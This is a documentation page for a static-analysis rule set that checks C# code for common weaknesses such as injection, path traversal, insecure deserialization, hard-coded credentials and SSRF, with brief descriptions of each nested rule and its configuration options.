C#-CWE¶
Checks for CWEs in C#
Nested Rules
Improper Input Validation (CWE-20): application fails to validate or sanitize input, allowing unexpected values |
|
The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as “..” that can resolve to a location that is outside of that directory |
|
The product constructs commands or command-like strings using externally-influenced input from an upstream component, but it does not properly neutralize or validate special elements that could change the meaning of the command when sent to a downstream component (leading to command injection or unintended command modification) |
|
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component |
|
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users |
|
The product constructs all or part of an SQL command using externally influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream database |
|
Code Injection / Improper Control of Generation of Code (CWE-94): executing or compiling untrusted input as code or expressions |
|
The application performs improper privilege management, which can allow an attacker to escalate privileges or bypass access controls |
|
Incorrect Default Permissions (CWE-276): files or directories created with insecure default ACLs |
|
The application performs improper authentication, which can allow an attacker to bypass authentication mechanisms |
|
Missing authentication for critical functions (CWE-306) |
|
Public controller methods that change state (POST/PUT/DELETE) must enforce CSRF validation |
|
Race condition: unsynchronized access to shared resources can lead to incorrect behavior or security issues |
|
The web application allows unrestricted upload of files with dangerous types that can be automatically processed within the web server’s environment |
|
Deserialization of untrusted data may lead to remote code execution or arbitrary object instantiation (CWE-502) |
|
The product contains hard-coded credentials, such as passwords, API keys, or tokens, which may allow an attacker to gain unauthorized access if the source code is exposed |
|
The product does not perform an authorization check when an actor attempts to access a resource or perform an action |
|
Incorrect Authorization (CWE-863): sensitive actions performed without verifying user authorization |
|
Server-Side Request Forgery (SSRF): application issues HTTP requests to attacker-controlled URLs |
Options
Setting an option for this rule means setting the default for all nested rules.
This rule shares the following common options: exclude_in_macros, exclude_messages_in_system_headers, excludes, extend_exclude_to_macro_invocations, includes, justification_checker, languages, post_processing, provider, report_at, severity
The following places define options that affect this rule: Stylechecks, Analysis-GlobalOptions
This rule has no individual options.